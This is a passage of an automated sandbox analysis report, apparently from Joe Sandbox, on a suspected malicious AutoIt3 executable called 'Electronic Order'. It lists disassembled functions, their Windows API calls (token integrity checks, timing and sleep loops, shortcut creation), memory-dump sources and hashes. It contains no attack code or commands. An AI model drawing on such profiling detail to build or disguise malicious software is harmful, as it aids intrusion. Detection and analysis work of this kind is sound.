                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E24DA5
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E24DAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                      • String ID:
                                      • API String ID: 3824534824-0
                                      • Opcode ID: e1a1f1f1e1a6d4e4401774cd49da6358b82b876a69ae650e8dc493ce83e8d6f7
                                      • Instruction ID: 09445a23a10badaeece45cf308fd6d1c748905c0dc8e7c9f493e340d5e92b395
                                      • Opcode Fuzzy Hash: e1a1f1f1e1a6d4e4401774cd49da6358b82b876a69ae650e8dc493ce83e8d6f7
                                      • Instruction Fuzzy Hash: 141108B6904258FFC7019FA9EC04ADA7FACEB45724F1442A5F918F73A1D6718D0887B0
                                      Function 00E1874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E18766
                                      • GetLastError.KERNEL32(?,00E1822A,?,?,?), ref: 00E18770
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00E1822A,?,?,?), ref: 00E1877F
                                      • HeapAlloc.KERNEL32(00000000,?,00E1822A,?,?,?), ref: 00E18786
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E1879D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: 2d81a0bdd8ec175597e7ef60164597755b87b93354820fda54477e9d1f6ac746
                                      • Instruction ID: 4558adfe5d37513ba49547e8f6d3748878cb70f1bcb680ba86be9b091b2f3c22
                                      • Opcode Fuzzy Hash: 2d81a0bdd8ec175597e7ef60164597755b87b93354820fda54477e9d1f6ac746
                                      • Instruction Fuzzy Hash: F2016D75601204FFDB205FA6DD88DAB7BACFF8A755720047AF949E2260DA318C45CA60
                                      Function 00E254E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E25502
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E25510
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E25518
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E25522
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E2555E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: a85b644912ee4b0795b99812cbab434ae36d2e9603efcb5ba2f62e7c88f3eab7
                                      • Instruction ID: c64dba1f28fbec7bd371b7c2e01cd7f3afb04d54ba9b79112d181c076372b3f4
                                      • Opcode Fuzzy Hash: a85b644912ee4b0795b99812cbab434ae36d2e9603efcb5ba2f62e7c88f3eab7
                                      • Instruction Fuzzy Hash: 45015B36C01A29DBCF00EFE9E9885EDBB79FB0A711F040056E911B2240DB305554C7A1
                                      Function 00E17652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?,?,00E1799D), ref: 00E1766F
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E1768A
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E17698
                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?), ref: 00E176A8
                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E176B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: 87d284233bde260df38629ff634b15d1faedceb630adc61a528215672dec956c
                                      • Instruction ID: e2be7e6d51a81199d12b49da148e98c6649b25305bdfed2b47c58c71ced407d6
                                      • Opcode Fuzzy Hash: 87d284233bde260df38629ff634b15d1faedceb630adc61a528215672dec956c
                                      • Instruction Fuzzy Hash: A701B1B6600604AFDB104F59DC04AAA7FBCEB49F51F100028FD44E7211EB31DD8187A0
                                      Function 00E185F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E18608
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E18612
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E18621
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E18628
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E1863E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: b0153c8f16ca5c67163b595e0659267eab3f714befae33bfcbc004d9ec48bcaa
                                      • Instruction ID: f38e96547cb7b586194f5de8cea5d2f95ff595712184a926028b3e1fc3253ce3
                                      • Opcode Fuzzy Hash: b0153c8f16ca5c67163b595e0659267eab3f714befae33bfcbc004d9ec48bcaa
                                      • Instruction Fuzzy Hash: A6F06235201204AFEB200FA6DD8DEAB3BACEF8AB58B001425F945E6151CB71DC86DA60
                                      Function 00E18652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E18669
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E18673
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E18682
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E18689
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E1869F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: bc12312f27417ec86cddf4598460f3d3305a6d04cb951ba700021ee63f7e8b95
                                      • Instruction ID: 1ec98915111cbf4a07c402b88526d0a579dcfe291a5c7ebdde503e4d418d0e77
                                      • Opcode Fuzzy Hash: bc12312f27417ec86cddf4598460f3d3305a6d04cb951ba700021ee63f7e8b95
                                      • Instruction Fuzzy Hash: 9DF06279201304AFEB211FA6EC88EA73BACEF8AB58B100035F945E6151CB71DD46DA60
                                      Function 00E1C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00E1C6BA
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E1C6D1
                                      • MessageBeep.USER32(00000000), ref: 00E1C6E9
                                      • KillTimer.USER32(?,0000040A), ref: 00E1C705
                                      • EndDialog.USER32(?,00000001), ref: 00E1C71F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 77213f7f82c90833b533fa3928ee9445a810f8d4877b9f56058840d265d231a6
                                      • Instruction ID: e34295fedf9008e77a7500628c95d2084633e2ed8ec7812eeaac323f2ecaefcf
                                      • Opcode Fuzzy Hash: 77213f7f82c90833b533fa3928ee9445a810f8d4877b9f56058840d265d231a6
                                      • Instruction Fuzzy Hash: A5018F34440304ABEB215B21DD4EFE677B8FB05B05F0016AAF542F14E0DBE0A9998E90
                                      Function 00DC13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • EndPath.GDI32(?), ref: 00DC13BF
                                      • StrokeAndFillPath.GDI32(?,?,00DFBAD8,00000000,?), ref: 00DC13DB
                                      • SelectObject.GDI32(?,00000000), ref: 00DC13EE
                                      • DeleteObject.GDI32 ref: 00DC1401
                                      • StrokePath.GDI32(?), ref: 00DC141C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: bf36f7cc94457193884ac90a891015fa10ea7e36001056d9c63bb90260c2046d
                                      • Instruction ID: 4f6a3d17afcb7fbc26bc3ad255137b8498bf32f2cf97d96537b3abc8a58613c3
                                      • Opcode Fuzzy Hash: bf36f7cc94457193884ac90a891015fa10ea7e36001056d9c63bb90260c2046d
                                      • Instruction Fuzzy Hash: 15F0E134004349DFDB195F57EC0CB543FA4AB42726F18C228E46D690F2C731459ADF60
                                      Function 00E2C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00E2C69D
                                      • CoCreateInstance.OLE32(00E52D6C,00000000,00000001,00E52BDC,?), ref: 00E2C6B5
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • CoUninitialize.OLE32 ref: 00E2C922
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                      • String ID: .lnk
                                      • API String ID: 2683427295-24824748
                                      • Opcode ID: a3e02014e578a729817db3d893473e2cec415b213bc3b222586808e3db5a0546
                                      • Instruction ID: d3a9ac81e561d5f86e76f67315710ac105e7dbc7bc155bad2a2495389bc2f45b
                                      • Opcode Fuzzy Hash: a3e02014e578a729817db3d893473e2cec415b213bc3b222586808e3db5a0546
                                      • Instruction Fuzzy Hash: 66A12B71108306AFD700EF54C895EABB7E8EF95704F04495CF1969B1A2EB70EA49CB72
                                      Function 00DD2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DE0FF6: std::exception::exception.LIBCMT ref: 00DE102C
                                        • Part of subcall function 00DE0FF6: __CxxThrowException@8.LIBCMT ref: 00DE1041
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00DC7BB1: _memmove.LIBCMT ref: 00DC7C0B
                                      • __swprintf.LIBCMT ref: 00DD302D
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00DD2EC6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 1943609520-557222456
                                      • Opcode ID: 0eb4891d03910726f885444767bc7cbebfcfb7d524b2deb3e7f4186b4323f73b
                                      • Instruction ID: 289e34aba6bf42b3ad67bc12c07838d1d4033e0f3082ce50ebb003e7e3598328
                                      • Opcode Fuzzy Hash: 0eb4891d03910726f885444767bc7cbebfcfb7d524b2deb3e7f4186b4323f73b
                                      • Instruction Fuzzy Hash: 48917E712083429FC728EF24D885E7EB7A4EF85750F04491EF4869B2A1DA70EE44CB72
                                      Function 00E2BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC48A1,?,?,00DC37C0,?), ref: 00DC48CE
                                      • CoInitialize.OLE32(00000000), ref: 00E2BC26
                                      • CoCreateInstance.OLE32(00E52D6C,00000000,00000001,00E52BDC,?), ref: 00E2BC3F
                                      • CoUninitialize.OLE32 ref: 00E2BC5C
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                      • String ID: .lnk
                                      • API String ID: 2126378814-24824748
                                      • Opcode ID: 8d15d8746f1798c84c27a4da848869b848be523c0dc16e1c4c18b3fedc6dc555
                                      • Instruction ID: 6aeb71bb7ce867ecd7e4b81206fb26e026f8747097257af7af28d40d515724cc
                                      • Opcode Fuzzy Hash: 8d15d8746f1798c84c27a4da848869b848be523c0dc16e1c4c18b3fedc6dc555
                                      • Instruction Fuzzy Hash: 4EA155752043129FCB04DF24C494E5ABBE5FF88314F05898CF899AB2A1CB31ED45CBA1
                                      Function 00E1B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00E1B981
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container$%
                                      • API String ID: 3565006973-1286912533
                                      • Opcode ID: ac6096aefd05e48246b10f272b808bc64faec97c977f24d7dffba1f25c606aa8
                                      • Instruction ID: 407a112577d19bafa6cfa5866b394d33db7ca0bf0dad75e77af68049e204e12d
                                      • Opcode Fuzzy Hash: ac6096aefd05e48246b10f272b808bc64faec97c977f24d7dffba1f25c606aa8
                                      • Instruction Fuzzy Hash: 69915D706003019FDB24DF24C885AA6BBF9FF49714F14956DF94AEB291DB70E881CB60
                                      Function 00DE524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 00DE52DD
                                        • Part of subcall function 00DF0340: __87except.LIBCMT ref: 00DF037B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__87except__start
                                      • String ID: pow
                                      • API String ID: 2905807303-2276729525
                                      • Opcode ID: ab10ad309121ffd38cc61d60ea075e32d255dc051b6bc38e4c58d4542e29f6fb
                                      • Instruction ID: 2e21f74156cf92bd68a8a46588a88aadcbd54e19ab982884d54450ca5e0876c0
                                      • Opcode Fuzzy Hash: ab10ad309121ffd38cc61d60ea075e32d255dc051b6bc38e4c58d4542e29f6fb
                                      • Instruction Fuzzy Hash: 08518A20A0964986CB117726E90037E6FD4EB00384F28CD58E2D5832EFEE74CCD89A76
                                      Function 00DE023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #$+
                                      • API String ID: 0-2552117581
                                      • Opcode ID: 2d433630c015ac5c1026d641fd4213107be9662ac912bf471614836d7c5c9c1b
                                      • Instruction ID: aa34c345b583f0c15aa2eb44dfe40e0132ddacea66cfc3c420de0491fbace08b
                                      • Opcode Fuzzy Hash: 2d433630c015ac5c1026d641fd4213107be9662ac912bf471614836d7c5c9c1b
                                      • Instruction Fuzzy Hash: 38513676104246CFDF15EF29D488AFA7BA4EF96314F184055E891AB2A0C7749CC2CB71
                                      Function 00DD62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memset$_memmove
                                      • String ID: ERCP
                                      • API String ID: 2532777613-1384759551
                                      • Opcode ID: 66f3fe2f4ebbff89c06aaf930dc6acae39da1346442004f89d282d9db14d3f7f
                                      • Instruction ID: d7761ff814632c9615c2e6768cdc87ebd8ab039231c0e2e06dd78f79899e1155
                                      • Opcode Fuzzy Hash: 66f3fe2f4ebbff89c06aaf930dc6acae39da1346442004f89d282d9db14d3f7f
                                      • Instruction Fuzzy Hash: 9D51B171A043099BCB24DF65C8857EABBF4EF04314F24856FE64AD7241E771D684CBA0
                                      Function 00E47BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E4F910,00000000,?,?,?,?), ref: 00E47C4E
                                      • GetWindowLongW.USER32 ref: 00E47C6B
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E47C7B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
